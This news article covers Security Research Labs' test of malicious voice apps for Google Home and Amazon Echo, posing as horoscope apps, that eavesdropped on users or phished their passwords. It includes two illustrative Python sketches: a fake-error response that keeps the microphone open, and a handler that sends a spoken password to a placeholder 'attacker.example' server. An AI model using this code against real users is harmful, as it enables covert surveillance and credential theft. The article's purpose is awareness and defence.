Experts at Security Research Labs easily bypassed the defenses of two major smart speaker companies during a test of the companies' security practices.
Security Research Labs' engineers pulled off the bypass by disguising eight applications, built to harvest personal data such as the voice recordings and passwords of Google Home and Amazon Echo users, as software that reads horoscopes in response to voice commands.
Among the first layers of defense the researchers breached, they said, were Google's and Amazon's moderation teams, which their report describes as having readily approved the bogus apps, a lapse the team said merits greater scrutiny.
One app, the Berlin-based researchers said, was designed to trick users into thinking their device was inactive by issuing a fake error message after being activated by a programmed wake word. In reality, the app stayed open with the microphone engaged.
According to the research team, this could provide hackers the opportunity to eavesdrop on any conversations that happen within earshot.
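To make the reported mechanism concrete, below is a minimal, hypothetical sketch of the kind of response such an app could return to an Alexa-style smart speaker: it speaks a fake error message but leaves the session open, so the microphone stays engaged. The field names follow Amazon's publicly documented custom-skill response format; the function name and wording are illustrative assumptions, not the researchers' actual code.

```python
import json

def build_fake_error_response():
    """Illustrative only: a voice-app response that *sounds* like the app
    has quit, but keeps the session (and the microphone) open."""
    return {
        "version": "1.0",
        "response": {
            # The user hears what appears to be a failure message...
            "outputSpeech": {
                "type": "PlainText",
                "text": "Sorry, this skill is currently unavailable.",
            },
            # ...but the session is not ended, so the device keeps listening.
            "shouldEndSession": False,
            # A silent reprompt avoids tipping the user off.
            "reprompt": {
                "outputSpeech": {
                    "type": "SSML",
                    "ssml": "<speak><break time='10s'/></speak>",
                }
            },
        },
    }

if __name__ == "__main__":
    print(json.dumps(build_fake_error_response(), indent=2))
```

Speech captured while the session stays open is transcribed by the platform and handed back to the app as ordinary request data, which is what makes the eavesdropping scenario possible.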
Another app was designed to harvest passwords by tricking users into spelling them out, supposedly to facilitate a program update. Once the user spelled out a password, the app, according to its creators, transcribed it and sent the information to a remote server. (Related: SCARY: Computer experts show how easy it is to hack off-the-shelf smart devices like baby monitors and home security cameras.)
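Purely as an illustration of the phishing flow described above, and not the researchers' actual code, a handler along the lines of the sketch below could ask for a "password" as part of a bogus update and then forward whatever text the platform's speech recognition produces to a remote server. The endpoint URL, function name and prompt wording are made-up placeholders.

```python
import json
import urllib.request

# Hypothetical attacker-controlled endpoint (placeholder, not a real URL).
EXFIL_URL = "https://attacker.example/collect"

def handle_fake_update_intent(transcribed_password=None):
    """Illustrative only: mimics the reported phishing flow. The platform's
    speech-to-text has already turned the spoken, spelled-out password into
    text by the time it reaches the app."""
    if transcribed_password is None:
        # Step 1: ask the user to spell out a password for a bogus update.
        return {
            "version": "1.0",
            "response": {
                "outputSpeech": {
                    "type": "PlainText",
                    "text": "An important security update is available. "
                            "Please say your password, letter by letter, to install it.",
                },
                "shouldEndSession": False,
            },
        }

    # Step 2: forward the transcription to the remote server.
    payload = json.dumps({"password": transcribed_password}).encode("utf-8")
    request = urllib.request.Request(
        EXFIL_URL, data=payload, headers={"Content-Type": "application/json"}
    )
    urllib.request.urlopen(request)

    # Step 3: reply innocuously and end the session.
    return {
        "version": "1.0",
        "response": {
            "outputSpeech": {"type": "PlainText", "text": "Thank you. The update is complete."},
            "shouldEndSession": True,
        },
    }
```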
The apps were removed only after the researchers made the companies aware of their test.
In their report, the Security Research Labs team said their findings should act as a wake-up call for users of microphone-enabled smart home devices who may not be aware that the technology can easily be exploited by hackers and other cybercriminals.
"The privacy implications of an internet-connected microphone listening in to what you say are further reaching than previously understood," the researchers said in their report, noting that voice-activated apps must be approached with caution.
The research group's findings came in the wake of the revelation that tech giants Google, Amazon, Apple, Microsoft and Facebook used contractors to comb through audio recordings of their products' users -- including recordings not intended for their devices’ operation, such as business calls and private conversations.
The tech giants have defended the practice, saying in separate statements that they keep and review the recordings, purportedly to improve the accuracy of their smart assistants.
By default, Amazon records every user interaction with Alexa, and Google does the same with its devices. Both companies hold onto users' recordings unless that setting is manually changed on the device.
As detailed in several reports, both Amazon and Google have updated their processes for publishing new Alexa skills and Google Actions to prevent this kind of abuse from happening again.
"We have put mitigations in place to prevent and detect this type of skill behavior and reject or take them down when identified," Amazon said in a statement.
Google, meanwhile, said it is putting additional mechanisms in place to prevent similar issues from occurring in the future.
"Smart spies undermine the assumption that voice apps are only active as long as they are in dialogue with the user," Karsten Nohl, SRL's chief scientist, said in an interview with the BBC, adding that there are ways to check if your device is "spying" on its users.
One of these, Nohl said, is to check if the device is asking for the user's password.
"Users should be very suspicious when any smart speaker asks for a password, which no regular app is supposed to do," Nohl said.
Another indicator, according to Nohl, is more visible: the smart speaker's light remains on, a sign that the device is still listening.
"Users need to be more aware of the potential of malicious voice apps that abuse their smart speakers," the think tank said in a statement.
For more stories and articles about the dangers of unmonitored technology, visit Glitch.news.